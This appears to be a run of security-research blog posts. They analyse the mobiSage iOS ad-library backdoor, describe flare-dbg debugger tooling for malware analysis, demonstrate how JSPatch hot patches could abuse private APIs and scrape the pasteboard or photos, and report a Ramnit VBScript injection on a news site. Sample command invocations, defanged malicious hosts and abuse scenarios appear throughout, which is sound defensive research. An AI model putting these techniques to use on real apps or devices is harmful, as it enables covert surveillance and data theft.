As shown in Figure 1, the affected mobiSage library included two key components, separately implemented in Objective-C and JavaScript. The Objective-C component, which we refer to as msageCore, implements the underlying functionality of the potential backdoors and exposed interfaces to the JavaScript context through a WebView. The JavaScript component, which we refer to as msageJS, provides high-level execution logic and can trigger the potential backdoors by invoking the interfaces exposed by msageCore. Each component has its own separate version number.

Figure 1: Key components of backdoored mobiSage SDK

In the remainder of this section, we reveal internal details of msageCore, including its communication channel and high-risk interfaces. Then we describe how msageJS is launched and updated, and how it can trigger the backdoors.

Backdoors in msageCore

Communication channel

MsageCore implements a general framework to communicate with msageJS via the ad library’s WebView. Commands and parameters are passed via specially crafted URLs in the format adsagejs://cmd&parameter. As shown in the reconstructed code fragment in Figure 2, msageCore fetches the command and parameters from the JavaScript context and inserts them in its command queue.

Figure 2: Communication via URL loading in WebView

To process a command in its queue, msageCore dispatches the command, along with its parameters, to a corresponding Objective-C class and method. Figure 3 shows portions of the reconstructed command dispatching code.

Figure 3: Command dispatch in msageCore

At-risk interfaces

Each dispatched command ultimately arrives at an Objective-C class in msageCore. Table 1 shows a subset of msageCore classes and the corresponding interfaces that they expose.

msageCore Class Name

Interfaces

MSageCoreUIManagerPlugin

- captureAudio:

- captureImage:

- openMail:

- openSMS:

- openApp:

- openInAppStore:

- openCamera:

- openImagePicker:

- ...

MSageCoreLocation

- start:

- stop:

- setTimer:

- returnLocationInfo:webViewId:

- ...

MSageCorePluginFileModule

 

- createDir

- deleteDir:

- deleteFile:

- createFile:

- getFileContent:

- ...

MSageCoreKeyChain

- writeKeyValue:

- readValueByKey:

- resetValueByKey:

MSageCorePluginNetWork

- sendHttpGet:

- sendHttpPost:

- sendHttpUpload:

- ...

MSageCoreEncryptPlugin

- MD5Encrypt:

- SHA1Encrypt:

- AESEncrypt:

- AESDecrypt:

- DESEncrypt:

- DESDecrypt:

- XOREncrypt:

- XORDecrypt:

- RC4Encrypt:

- RC4Decrypt

- ...

Table 1: Selected interfaces exposed by msageCore

The selected interfaces reveal some of the key capabilities exposed by the potential backdoors in the library. They expose the potential ability to capture audio and screenshots while the affected app is in use, identify and launch other apps installed on the device, periodically monitor location, read and write files in the app’s data container, and read/write/reset “secure” keychain items stored by the app. Additionally, any data collected via these interfaces can be encrypted with various encryption schemes and uploaded to a remote server.

Beyond the selected interfaces, the ad library potentially exposed users to additional risks by including logic to promote and install “enpublic” apps as shown in Figure 4. As we have highlighted in previous blogs [footnotes 3, 4, 5, 6, 7], enpublic apps can introduce additional security risks by using private APIs in certain versions of iOS. These private APIs potentially allow for background monitoring of SMS or phone calls, breaking the app sandbox, stealing email messages, and demolishing arbitrary app installations. Apple has addressed a number of issues related to enpublic apps that we have brought to their attention.

Figure 4: Installing “enpublic” apps to bypass Apple App Store review

We can see how this ad library functions by examining the implementations of some of the selected interfaces. Figure 5 shows reconstructed code snippets for capturing audio. Before storing recorded audio to a file audio_xxx.wav, the code retrieves two parameters from the command for recording duration and threshold.

Figure 5: Capturing audio with duration and threshold

Figure 6 shows a code snippet for initializing the app’s keychain before reading. The accessed keychain is in the kSecClassGenericPassword class, which is widely used by apps for storing secret credentials such as passwords.

Figure 6: Reading the keychain in the kSecClassGenericPassword class

Remote control in msageJS

msageJS contains JavaScript code for communicating with a remote server and submitting commands to msageCore. The file layout of msageJS is shown in Figure 7. Inside sdkjs.js, we find a wrapper object called adsage and the JavaScript interface for command execution.

Figure 7: The file layout of msageJS

The command execution interface is constructed as follows:

          adsage.exec(className, methodName, argsList, onSuccess, onFailure);

The className and methodName parameters correspond to classes and methods in msageCore. The argsList parameter can be either a list or dict, and the exact types and values can be determined by reversing the methods in msageCore. The final two parameters are function callbacks invoked when the method exits. For example, the following invocation starts audio capture:

adsage.exec("MSageCoreUIManager", "captureAudio", ["Hey", 10, 40],  onSuccess, onFailure);

Note that the files comprising msageJS cannot be found by simply listing the files in an affected app’s IPA. The files themselves are zipped and encoded in Base64 in the data section of the ad library binary. After an affected app is launched, msageCore first decodes the string and extracts msageJS to the app’s data container, setting index.html shown in Figure 7 as the landing page in the ad library WebView to launch msageJS.

Figure 8: Base64 encoded JavaScript component in Zip format

When msageJS is launched, it sends a POST request to hxxp://entry.adsage.com/d/ to check for updates. The server responds with information about the latest msageJS version, including a download URL, as shown in Figure 9.

Figure 9: Server response to msageJS update request via HTTP POST

Enterprise Protection

To ensure the protection of our customers, FireEye has deployed detection rules in its Network Security (NX) and Mobile Threat Prevention (MTP) products to identify the affected apps and their network activities.

For FireEye NX customers, alerts will be generated if an employee uses an infected app while their iOS device is connected to the corporate network. FireEye MTP management customers have full visibility into high-risk apps installed on mobile devices in their deployment base. End users will receive on-device notifications of the risky app and IT administrators receive email alerts.

Conclusion

In this blog, we described an ad library that affected thousands of iOS apps with potential backdoor functionality. We revealed the internals of backdoors which could be used to trigger audio recording, capture screenshots, prompt the user to side-load other high-risk apps, and read sensitive data from the app’s keychain, among other dubious capabilities. We also showed how these potential backdoors in ad libraries could be controlled remotely by JavaScript code should their ad servers fall under malicious actors’ control.

[2] http://www.adsage.cn/
[3] https://www.fireeye.com/blog/threat-research/2015/08/ios_masque_attackwe.html
[4] https://www.fireeye.com/blog/threat-research/2015/02/ios_masque_attackre.html
[5] https://www.fireeye.com/blog/threat-research/2014/11/masque-attack-all-your-ios-apps-belong-to-us.html
[6] https://www.fireeye.com/blog/threat-research/2015/06/three_new_masqueatt.html
[7] https://www.virusbtn.com/virusbulletin/archive/2014/11/vb201411-Apple-without-shell

FLARE Script Series: Automating Obfuscated String Decoding

28 December 2015 at 14:01
Introduction

We are expanding our script series beyond IDA Pro. This post extends the FireEye Labs Advanced Reverse Engineering (FLARE) script series to an invaluable tool for the reverse engineer – the debugger. Just like IDA Pro, debuggers have scripting interfaces. For example, OllyDbg uses an asm-like scripting language, the Immunity debugger contains a Python interface, and Windbg has its own language. Each of these options isn’t ideal for rapidly creating string decoding debugger scripts. Both Immunity and OllyDbg only support 32-bit applications, and Windbg’s scripting language is specific to Windbg and, therefore, not as well-known. The pykd project was created to interface between Python and Windbg to allow debugger scripts to be written in Python. Because malware reverse engineers love Python, we built our debugger scripting library on top of pykd for Windbg.

Here we release a library we call flare-dbg. This library provides several utility classes and functions to rapidly develop scripts to automate debugging tasks within Windbg. Stay tuned for future blog posts that will describe additional uses for debugger scripts!

String Decoding

Malware authors like to hide the intent of their software by obfuscating their strings. Quickly deobfuscating strings allows you to quickly figure out what the malware is doing.

As stated in Practical Malware Analysis, there are generally two approaches to deobfuscating strings: self-decoding and manual programming. The self-decoding approach allows the malware to decode its own strings. Manual programming requires the reverse engineer to reprogram the decoding function logic. A subset of the self-decoding approach is emulation, where each assembly instruction execution is emulated. Unfortunately, library call emulation is required, and emulating every library call is difficult and may cause inaccurate results. In contrast, a debugger is attached to the actual running process, so all the library functions can be run without issue. Each of these approaches has their place, but this post teaches a way to use debugger scripting to automatically self-decode all obfuscated strings.

Challenge

To decode all obfsucated strings, we need to find the following: the string decoder function, each time it is called, and all arguments to each of those instances. We then need to run the function and read out the result. The challenge is to do this in a semi-automated way.

Approach

The first task is to find the string decoder function and get a basic understanding of the inputs and outputs of the function. The next task is to identify each time the string decoder function is called and all of the arguments to each call. Without using IDA, a handy Python project for binary analysis is Vivisect. Vivisect contains several heuristics for identifying functions and cross-references. Additionally, Vivisect can emulate and disassemble a series of opcodes, which can help us identify function arguments. If you haven’t already, be sure to check out the FLARE scripting series post on tracking function arguments using emulation, which also uses Vivisect.

Introducing flare-dbg

The FLARE team is introducing a Python project, flare-dbg that runs on top of pykd. Its goal is to make Windbg scripting easy. The heart of the flare-dbg project lies in the DebugUtils class, which contains several functions to handle:

·      Memory and register manipulation
·      Stack operations
·      Debugger execution
·      Breakpoints
·      Function calling

In addition to the basic debugger utility functions, the DebugUtils class uses Vivisect to handle the binary analysis portion.

Example

I wrote a simple piece of malware that hides strings by encoding them. Figure 1 shows an HTTP User-Agent string being decoded by a function I named string_decoder.

Figure 1: String decoder function reference in IDA Pro

After a cursory look at the string_decoder function, the arguments are identified as an offset to an encoded string of bytes, an output address, and a length. The function can be described as the following C prototype:

Now that we have a basic understanding of the string_decoder function, we test decoding using Windbg and flare-dbg. We begin by starting the process with Windbg and executing until the program’s entry point. Next, we start a Python interactive shell within Windbg using pykd and import flaredbg.

Next, we create a DebugUtils object, which contains the functions we need to control the debugger.

We then allocate 0x3A-bytes of memory for the output string. We use the newly allocated memory as the second parameter and setup the remainder of the arguments.

Finally, we call the string_decoder function at virtual address 0x401000, and read the output string buffer.

After proving we can decode a string with flare-dbg, let’s automate all calls to the string_decoder function. An example debugger script is shown in Figure 2. The full script is available in the examples directory in the github repository.

Figure 2. Example basic debugger script

Let’s break this script down. First, we identify the function virtual address of the string decoder function and create a DebugUtils object. Next, we use the DebugUtils function get_call_list to find the three push arguments for each time string_decoder is called.

Once the call_list is generated, we iterate all calling addresses and associated arguments. In this example, the output string is decoded to the stack. Because we are only executing the string decoder function and won’t have the same stack setup as the malware, we must allocate memory for the output string. We use the third parameter, the length, to specify the size of the memory allocation. Once we allocate memory for the output string, we set the newly allocated memory address as the second parameter to receive the output bytes.

Finally, we run the string_decoder function by using the DebugUtils call function and read the result from our allocated buffer. The call function sets up the stack, sets any specified register values, and executes the function. Once all strings are decoded, the final step is to get these strings back into our IDB. The utils script contains utility functions to create IDA Python scripts. In this case, we output an IDA Python script that creates comments in the IDB.

Running this debugger script produces the following output:

The output IDA Python script creates repeatable comments on all encoded string locations, as shown in Figure 3.

Figure 3. Decoded string as comment

Conclusion

Stay tuned for another debugger scripting series post that will focus on plugins! For now, head over to the flare-dbg github project page to get started. The project requires pykd,winappdbg, and vivisect.

Hot or Not? The Benefits and Risks of iOS Remote Hot Patching

By: Jing Xie
27 January 2016 at 13:00

Introduction

Apple has made a significant effort to build and maintain a healthy and clean app ecosystem. The essential contributing component to this status quo is the App Store, which is protected by a thorough vetting process that scrutinizes all submitted applications. While the process is intended to protect iOS users and ensure apps meet Apple’s standards for security and integrity, developers who have experienced the process would agree that it can be difficult and time consuming. The same process then must be followed when publishing a new release or issuing a patched version of an existing app, which can be extremely frustrating when a developer wants to patch a severe bug or security vulnerability impacting existing app users.

The developer community has been searching for alternatives, and with some success. A set of solutions now offer a more efficient iOS app deployment experience, giving app developers the ability to update their code as they see fit and deploy patches to users’ devices immediately. While these technologies provide a more autonomous development experience, they do not meet the same security standards that Apple has attempted to maintain. Worse, these methods might be the Achilles heel to the walled garden of Apple’s App Store.

In this series of articles, FireEye mobile security researchers examine the security risks of iOS apps that employ these alternate solutions for hot patching, and seek to prevent unintended security compromises in the iOS app ecosystem.

As the first installment of this series, we look into an open source solution: JSPatch.

Episode 1. JSPatch

JSPatch is an open source project – built on top of Apple’s JavaScriptCore framework – with the goal of providing an alternative to Apple’s arduous and unpredictable review process in situations where the timely delivery of hot fixes for severe bugs is vital. In the author’s own words (bold added for emphasis):

JSPatch bridges Objective-C and JavaScript using the Objective-C runtime. You can call any Objective-C class and method in JavaScript by just including a small engine. That makes the APP obtaining the power of script language: add modules or replacing Objective-C code to fix bugs dynamically.

JSPatch Machinery

The JSPatch author, using the alias Bang, provided a common example of how JSPatch can be used to update a faulty iOS app on his blog:

Figure 1 shows an Objc implementation of a UITableViewController with class name JPTableViewController that provides data population via the selector tableView:didSelectRowAtIndexPath:. At line 5, it retrieves data from the backend source represented by an array of strings with an index mapping to the selected row number. In many cases, this functions fine; however, when the row index exceeds the range of the data source array, which can easily happen, the program will throw an exception and subsequently cause the app to crash. Crashing an app is never an appealing experience for users.

Figure 1. Buggy Objc code without JSPatch

Within the realm of Apple-provided technologies, the way to remediate this situation is to rebuild the application with updated code to fix the bug and submit the newly built app to the App Store for approval. While the review process for updated apps often takes less time than the initial submission review, the process can still be time-consuming, unpredictable, and can potentially cause loss of business if app fixes are not delivered in a timely and controlled manner.

However, if the original app is embedded with the JSPatch engine, its behavior can be changed according to the JavaScript code loaded at runtime. This JavaScript file (hxxp://cnbang.net/bugfix.JS in the above example) is remotely controlled by the app developer. It is delivered to the app through network communication.   

Figure 2 shows the standard way of setting up JSPatch in an iOS app. This code would allow download and execution of a JavaScript patch when the app starts:

Figure 2. Objc code enabling JSPatch in an app

JSPatch is indeed lightweight. In this case, the only additional work to enable it is to add seven lines of code to the application:didFiishLaunchingWithOptions: selector. Figure 3 shows the JavaScript downloaded from hxxp://cnbang.net/bugfix.JS that is used to patch the faulty code.

Figure 3. JSPatch hot patch fixing index out of bound bug in Figure 1

Malicious Capability Showcase

JSPatch is a boon to iOS developers. In the right hands, it can be used to quickly and effectively deploy patches and code updates. But in a non-utopian world like ours, we need to assume that bad actors will leverage this technology for unintended purposes. Specifically, if an attacker is able to tamper with the content of JavaScript file that is eventually loaded by the app, a range of attacks can be successfully performed against an App Store application.

Target App

We randomly picked a legitimate app [1] with JSPatch enabled from the App Store. The logistics of setting up the JSPatch platform and resources for code patching are packaged in this routine [AppDelegate excuteJSPatch:], as shown in Figure 4 [2]:

Figure 4. JSPatch setup in the targeted app

There is a sequence of flow from the app entry point (in this case the AppDelegate class) to where the JavaScript file containing updates or patch code is written to the file system. This process involves communicating with the remote server to retrieve the patch code. On our test device, we eventually found that the JavaScript patch code is hashed and stored at the location shown in Figure 5. The corresponding content is shown in Figure 6 in Base64-encoded format:

Figure 5. Location of downloaded JavaScript on test device


Figure 6. Encrypted patch content

While the target app developer has taken steps to secure this sensitive data from prying eyes by employing Base64 encoding on top of a symmetric encryption, one can easily render this attempt futile by running a few commands through Cycript. The patch code, once decrypted, is shown in Figure 7:

Figure 7. Decrypted original patch content retrieved from remote server

This is the content that gets loaded and executed by JPEngine, the component provided by the JSPatch framework embedded in the target app. To change the behavior of the running app, one simply needs to modify the content of this JavaScript blob. Below we show several possibilities for performing malicious actions that are against Apple’s App Review Guidelines. Although the examples below are from a jailbroken device, we have demonstrated that they will work on non-jailbroken devices as well.

Example 1: Load arbitrary public frameworks into app process

a.     Example public framework: /System/Library/Frameworks/Accounts.framework
b.     Private APIs used by public framework: [ACAccountStore init], [ACAccountStore allAccountTypes]

The target app discussed above, when running, loads the frameworks shown in Figure 8 into its process memory:


Figure 8. iOS frameworks loaded by the target app

Note that the list above – generated from the Apple-approved iOS app binary – does not contain Accounts.framework. Therefore, any “dangerous” or “risky” operations that rely on the APIs provided by this framework are not expected to take place. However, the JavaScript code shown in Figure 9 invalidates that assumption.

Figure 9. JavaScript patch code that loads the Accounts.framework into the app process

If this JavaScript code were delivered to the target app as a hot patch, it could dynamically load a public framework, Accounts.framework, into the running process. Once the framework is loaded, the script has full access to all of the framework’s APIs. Figure 10 shows the outcome of executing the private API [ACAccountStore allAccountTypes], which outputs 36 account types on the test device. This added behavior does not require the app to be rebuilt, nor does it require another review through the App Store.  

Figure 10. The screenshot of the console log for utilizing Accounts.framework

The above demonstration highlights a serious security risk for iOS app users and app developers. The JSPatch technology potentially allows an individual to effectively circumvent the protection imposed by the App Store review process and perform arbitrary and powerful actions on the device without consent from the users. The dynamic nature of the code makes it extremely difficult to catch a malicious actor in action. We are not providing any meaningful exploit in this blog post, but instead only pointing out the possibilities to avoid low-skilled attackers taking advantage of off-the-shelf exploits.

Example 2: Load arbitrary private frameworks into app process

a.     Example private framework: /System/Library/PrivateFrameworks/BluetoothManager.framework
b.   
Private APIs used by example framework: [BluetoothManager connectedDevices], [BluetoothDevice name]

Similar to the previous example, a malicious JSPatch JavaScript could instruct an app to load an arbitrary private framework, such as the BluetoothManager.framework, and further invoke private APIs to change the state of the device. iOS private frameworks are intended to be used solely by Apple-provided apps. While there is no official public documentation regarding the usage of private frameworks, it is common knowledge that many of them provide private access to low-level system functionalities that may allow an app to circumvent security controls put in place by the OS. The App Store has a strict policy prohibiting third party apps from using any private frameworks. However, it is worth pointing out that the operating system does not differentiate Apple apps’ private framework usage and a third party app’s private framework usage. It is simply the App Store policy that bans third party use.

With JSPatch, this restriction has no effect because the JavaScript file is not subject to the App Store’s vetting. Figure 11 shows the code for loading the BluetoothManager.framework and utilizing APIs to read and change the states of Bluetooth of the host device. Figure 12 shows the corresponding console outputs.

Figure 11. JavaScript patch code that loads the BluetoothManager.framework into the app process

 

Figure 12. The screenshot of the console log for utilizing BluetoothManager.framework

Example 3: Change system properties via private API

a.     Example dependent framework: b/System/Library/Frameworks/CoreTelephony.framework
b.    Private API used by example framework: [CTTelephonyNetworkInfo updateRadioAccessTechnology:]

Consider a target app that is built with the public framework CoreTelephony.framework. Apple documentation explains that this framework allows one to obtain information about a user’s home cellular service provider. It exposes several public APIs to developers to achieve this, but [CTTelephonyNetworkInfo updateRadioAccessTechnology:] is not one of them. However, as shown in Figure 13 and Figure 14, we can successfully use this private API to update the device cellular service status by changing the radio technology from CTRadioAccessTechnologyHSDPA to CTRadioAccessTechnologyLTE without Apple’s consent.

Figure 13. JavaScript code that changes the Radio Access Technology of the test device

 

Figure 14. Corresponding execution output of the above JavaScript code via Private API

Example 4: Access to Photo Album (sensitive data) via public APIs

a.     Example loaded framework: /System/Library/Frameworks/Photos.framework
b.     Public APIs: [PHAsset fetchAssetsWithMediaType:options:]

Privacy violations are a major concern for mobile users. Any actions performed on a device that involve accessing and using sensitive user data (including contacts, text messages, photos, videos, notes, call logs, and so on) should be justified within the context of the service provided by the app. However, Figure 15 and Figure 16 show how we can access the user’s photo album by leveraging the private APIs from built-in Photo.framework to harvest the metadata of photos. With a bit more code, one can export this image data to a remote location without the user’s knowledge.

Figure 15. JavaScript code that access the Photo Library

 

Figure 16. Corresponding output of the above JavaScript in Figure 15

Example 5: Access to Pasteboard in real time

a.     Example Framework: /System/Library/Frameworks/UIKit.framework
b
.     APIs: [UIPasteboard strings], [UIPasteboard items], [UIPasteboard string]

iOS pasteboard is one of the mechanisms that allows a user to transfer data between apps. Some security researchers have raised concerns regarding its security, since pasteboard can be used to transfer sensitive data such as accounts and credentials. Figure 17 shows a simple demo function in JavaScript that, when running on the JSPatch framework, scrapes all the string contents off the pasteboard and displays them on the console. Figure 18 shows the output when this function is injected into the target application on a device.

Figure 17. JavaScript code that scraps the pasteboard which might contain sensitive information

 

Figure 18. Console output of the scraped content from pasteboard by code in Figure 17

We have shown five examples utilizing JSPatch as an attack vector, and the potential for more is only constrained by an attacker’s imagination and creativity.

Future Attacks

Much of iOS’ native capability is dependent on C functions (for example, dlopen(), UIGetImageScreen()). Due to the fact that C functions cannot be reflectively invoked, JSPatch does not support direct Objective C to JavaScript mapping. In order to use C functions in JavaScript, an app must implement JSExtension, which packs the C function into corresponding interfaces that are further exported to JavaScript.

This dependency on additional Objective C code to expose C functions casts limitations on the ability of a malicious actor to perform operations such as taking stealth screenshots, sending and intercepting text messages without consent, stealing photos from the gallery, or stealthily recording audio. But these limitations can be easily lifted should an app developer choose to add a bit more Objective C code to wrap and expose these C functions. In fact, the JSPatch author could offer such support to app developers in the near future through more usable and convenient interfaces, granted there is enough demand. In this case, all of the above operations could become reality without Apple’s consent.

Security Impact

It is a general belief that iOS devices are more secure than mobile devices running other operating systems; however, one has to bear in mind that the elements contributing to this status quo are multi-faceted. The core of Apple’s security controls to provide and maintain a secure ecosystem for iOS users and developers is their walled garden – the App Store. Apps distributed through the App Store are significantly more difficult to leverage in meaningful attacks. To this day, two main attack vectors make up all previously disclosed attacks against the iOS platform:

1.     Jailbroken iOS devices that allow unsigned or ill-signed apps to be installed due to the disabled signature checking function. In some cases, the sandbox restrictions are lifted, which allows apps to function outside of the sandbox.

2.     App sideloading via Enterprise Certifications on non-jailbroken devices. FireEye published a series of reports that detailed attacks exploiting this attack surface, and recent reports show a continued focus on this known attack vector.

However, as we have highlighted in this report, JSPatch offers an attack vector that does not require sideloading or a jailbroken device for an attack to succeed. It is not difficult to identify that the JavaScript content, which is not subject to any review process, is a potential Achilles heel in this app development architecture. Since there are few to zero security measures to ensure the security properties of this file, the following scenarios for attacking the app and the user are conceivable:

●      Precondition: 1) App embeds JSPatch platform; 2) App Developer has malicious intentions.

○      Consequences: The app developer can utilize all the Private APIs provided by the loaded frameworks to perform actions that are not advertised to Apple or the users. Since the developer has control of the JavaScript code, the malicious behavior can be temporary, dynamic, stealthy, and evasive. Such an attack, when in place, will pose a big risk to all stakeholders involved.

○      Figure 19 demonstrates a scenario of this type of attack:

Figure 19. Threat model for JSPatch used by a malicious app developer

●      Precondition: 1) Third-party ad SDK embeds JSPatch platform; 2) Host app uses the ad SDK; 3) Ad SDK provider has malicious intention against the host app.

○      Consequences: 1) Ad SDK can exfiltrate data from the app sandbox; 2) Ad SDK can change the behavior of the host app; 3) Ad SDK can perform actions on behalf of the host app against the OS.

○      This attack scenario is shown in Figure 20:

Figure 20. Threat model for JSPatch used by a third-party library provider

The FireEye discovery of iBackdoor in 2015 is an alarming example of displaced trust within the iOS development community, and serves as a sneak peek into this type of overlooked threat.

●      Precondition: 1) App embeds JSPatch platform; 2) App Developer is legitimate; 3) App does not protect the communication from the client to the server for JavaScript content; 4) A malicious actor performs a man-in-the-middle (MITM) attack that tampers with the JavaScript content.

○      Consequences: MITM can exfiltrate app contents within the sandbox; MITM can perform actions through Private API by leveraging host app as a proxy.

○      This attack scenario is shown in Figure 21:

           Figure 21. Threat model for JSPatch used by an app targeted by MITM

Field Survey

JSPatch originated from China. Since its release in 2015, it has garnered success within the Chinese region. According to JSPatch, many popular and high profile Chinese apps have adopted this technology. FireEye app scanning found a total 1,220 apps in the App Store that utilize JSPatch.

We also found that developers outside of China have adopted this framework. On one hand, this indicates that JSPatch is a useful and desirable technology in the iOS development world. On the other hand, it signals that users are at greater risk of being attacked – particularly if precautions are not taken to ensure the security of all parties involved. Despite the risks posed by JSPatch, FireEye has not identified any of the aforementioned applications as being malicious.  

Food For Thought

Many applaud Apple’s App Store for helping to keep iOS malware at bay. While it is undeniably true that the App Store plays a critical role in winning this acclaim, it is at the cost of app developers’ time and resources.

One of the manifestations of such a cost is the app hot patching process, where a simple bug fix has to go through an app review process that subjects the developers to an average waiting time of seven days before updated code is approved. Thus, it is not surprising to see developers seeking various solutions that attempt to bypass this wait period, but which lead to unintended security risks that may catch Apple off guard.

JSPatch is one of several different offerings that provide a low-cost and streamlined patching process for iOS developers. All of these offerings expose a similar attack vector that allows patching scripts to alter the app behavior at runtime, without the constraints imposed by the App Store’s vetting process. Our demonstration of abusing JSPatch capabilities for malicious gain, as well as our presentation of different attack scenarios, highlights an urgent problem and an imperative need for a better solution – notably due to a growing number of app developers in China and beyond having adopted JSPatch.

Many developers have doubts that the App Store would accept technologies leveraging scripts such as JavaScript. According to Apple’s App Store Review Guidelines, apps that download code in any way or form will be rejected. However, the JSPatch community argues it is in compliance with Apple’s iOS Developer Program Information, which makes an exception to scripts and code downloaded and run by Apple's built-in WebKit framework or JavascriptCore, provided that such scripts and code do not change the primary purpose of the application by providing features or functionality that are inconsistent with the intended and advertised purpose of the application as submitted to the App Store.

The use of malicious JavaScript (which presumably changes the primary purpose of the application) is clearly prohibited by the App Store policy. JSPatch is walking a fine line, but it is not alone. In our coming reports, we intend to similarly examine more solutions in order to find a better solution that satisfies Apple and the developer community without jeopardizing the users security experience. Stay tuned!

 

[1] We have contacted the app provider regarding the issue. In order to protect the app vendor and its users, we choose to not disclose the identity before they have this issue addressed.
[2] The redacted part is the hardcoded decryption key.

 

FLARE Script Series: flare-dbg Plug-ins

9 February 2016 at 12:00

Introduction

This post continues the FireEye Labs Advanced Reverse Engineering (FLARE) script series. In this post, we continue to discuss the flare-dbg project. If you haven’t read my first post on using flare-dbg to automate string decoding, be sure to check it out!

We created the flare-dbg Python project to support the creation of plug-ins for WinDbg. When we harness the power of WinDbg during malware analysis, we gain insight into runtime behavior of executables. flare-dbg makes this process particularly easy. This blog post discusses WinDbg plug-ins that were inspired by features from other debuggers and analysis tools. The plug-ins focus on collecting runtime information and interacting with malware during execution. Today, we are introducing three flare-dbg plug-ins, which are summarized in Table 1.

Table 1: flare-dbg plug-in summary

To demonstrate the functionality of these plug-ins, this post uses a banking trojan (MD5: 03BA3D3CEAE5F11817974C7E4BE05BDE) known as TINBA to FireEye.

injectfind

Background

A common technique used by malware is code injection. When malware allocates a memory region to inject code, the created region contains certain characteristics we use to identify them in a process’s memory space. The injectfind plug-in finds and displays information about injected regions of memory from within WinDbg.

The injectfind plug-in is loosely based off the Volatility malfind plug-in. Given a memory dump, the Volatility variant searches memory for injected code and shows an analyst injected code found within processes. Instead of requiring a memory dump, the injectfind WinDbg plug-in runs in a debugger. Similar to malfind, the injectfind plug-in identifies memory regions that may have had code injected and prints a hex dump and a disassembly listing of each identified memory region. A quick glance at the output helps us identify injected code or hooked functions. The following section shows an example of an analyst identifying injected code with injectfind.

Example

After running the TINBA malware in an analysis environment, we observe that the initial loader process exits immediately, and the explorer.exe process begins making network requests to seemingly random domains. After attaching to the explorer.exe process with Windbg and running the injectfind plug-in, we see the output shown in Figure 1.

Figure 1: Output from the injectfind plug-in

The first memory region at virtual address 0x1700000 appears to contain references to Windows library functions and is 0x17000 bytes in size. It is likely that this memory region contains the primary payload of the TINBA malware.

The second memory region at virtual address 0x1CD0000 contains a single page, 0x1000 bytes in length, and appears to have two lines of meaningful disassembly. The disassembly shows the eax register being set to 0x30 and a jump five bytes into the NtCreateProcessEx function. Figure 2 shows the disassembly of the first few instructions of the NtCreateProcessEx function.

Figure 2: NtCreateProcessEx disassembly listing

The first instruction for NtCreateProcessEx is a jmp to an address outside of ntdll's memory. The destination address is within the first memory region that injectfind identified as injected code. We can quickly conclude that the malware creates a function hook for process creation all from within a Windbg debugger session.

membreak

Background

One feature missing from Windbg that is present in OllyDbg and x64dbg is the ability to set a breakpoint on an entire memory region. This type of breakpoint is known as a memory breakpoint. Memory breakpoints are used to pause a process when a specified region of memory is executed.

Memory breakpoints are useful when you want to break on code execution without specifying a single address. For example, many packers unpack their code into a new memory region and begin executing somewhere in this new memory. Setting a memory breakpoint on the new memory region would pause the debugger at the first execution anywhere within the new memory region. This obviates the need to tediously reverse engineer the unpacking stub to identify the original entry point.

One way to implement memory breakpoints is by changing the memory protection for a memory region by adding the PAGE_GUARD memory protection flag. When this memory region is executed, a STATUS_GUARD_PAGE_VIOLATION exception occurs. The debugger handles the exception and returns control to the user. The flare-dbg plug-in membreak uses this technique to implement memory breakpoints.

Example

After locating the injected code using the injectfind plug-in, we set a memory breakpoint to pause execution within the injected code memory region. The membreak plug-in accepts one or multiple addresses as parameters. The plug-in takes each address, finds the base address for the corresponding memory region, and changes the entire region’s permissions. As shown in Figure 3, when the membreak plug-in is run with the base address of the injected code as the parameter, the debugger immediately begins running until one of these memory regions is executed.

Figure 3: membreak plug-in run in Windbg

The output for the memory breakpoint hit shows a Guard page violation and a message about first chance exceptions. As explained above, this should be expected. Once the breakpoint is hit, the membreak plug-in restores the original page permissions and returns control to the analyst.

importfind

Background

Malware often loads Windows library functions at runtime and stores the resolved addresses as global variables. Sometimes it is trivial to resolve these statically in IDA Pro, but other times this can be a tedious process. To speed up the labeling of these runtime imported functions, we created a plug-in named importfind to find these function addresses. Behind the scenes, the plug-in parses each library's export table and finds all exported function addresses. The plug-in then searches the malware’s memory and identifies references to the library function addresses. Finally, it generates an IDAPython script that can be used to annotate an IDB workspace with the resolved library function names.

Example

Going back to TINBA, we saw text referencing Windows library functions in the output from injectfind above. The screenshot of IDA Pro in Figure 2 shows this same region of data. Note that following each ASCII string containing an API name, there is a number that looks like a pointer. Unfortunately, IDA Pro does not have the same insight as the debugger, so these addresses are not resolved to API functions and named.

Figure 4: Unnamed library function addresses

We use the importfind plug-in to find the function names associated with these addresses, as shown in Figure 5.

Figure 5: importfind plug-in run in Windbg

The importfind plug-in generates an IDA Python script file that is used to rename these global variables in our IDB as shown in Figure 2. Figure 6 shows a screenshot from IDA Pro after the script has renamed the global variables to more meaningful names.

Figure 6: IDA Pro with named global variables

Conclusion

This blog post shows the power of using the flare-dbg plug-ins with a debugger to gain insight into how the malware operates at runtime. We saw how to identify injected code using the injectfind plug-in and create memory breakpoints using membreak. We also demonstrated the usefulness of the importfind plug-in for identifying and renaming runtime imported functions.

To find out how to setup and get started with flare-dbg, head over the github project page where you’ll learn about setup and usage.

Maimed Ramnit Still Lurking in the Shadow

18 February 2016 at 17:00

Newspapers have the ability to do more than simply keep us current with worldly affairs; we can use them to squash bugs! Yet, as we move from waiting on the newspaper delivery boy to reading breaking news on ePapers, we lose the subtle art of bug squashing. Instead, we end up exposing ourselves to dangerous digital bugs that can affect our virtual worlds.

This is exactly what happened to visitors of one of the top five news sites of China. Any users running Internet Explorer (IE) who navigated to the website may have been exposed to an old, yet persistent VBScript worm that has the ability to self-replicate recursively from infected machines. Incidentally, the major actors involved with this old campaign have been taken down, yet traces of their injected recursive malware have still managed to sneak on to one of the highest browsed sites in China.

The FireEye Dynamic Threat Intelligence (DTI) first discovered that the site was compromised and used to host VBS/Ramnit on Jan. 28, 2016. We can confirm that the infection is still live as of the time of this writing. IE users who visit the site may be compromised if they browse to a specific page (paperindex[.]htm) and click ‘Yes’ to run ActiveX, which may appear to be safe since the website is familiar and popular. There is no exploit used for infection, simply social engineering and errant clicks.

As shown in Figure 1, a malicious VBScript is appeneded after the HTML body. Upon landing on this page, the victim’s browser will load the news content while it executes a malicious ActiveX component in the background.

Figure 1: Legitimate HTML page appended with malicious VBScript

As shown in Figure 2 and Figure 3, the VBScript drops a binary named “svchost.exe” in the %TEMP% folder and executes it upon successful ActiveX execution. In a case where the system is compromised, it also tries to connect to a CnC server, fget-career[.]com, which has been involved in campaigns for this trojan before.

Figure 2: The VBScript drops the binary in the %TEMP% folder and executes it

Figure 3: The full path to “svchost.exe” (using Internet Explorer 11 on Windows 7)

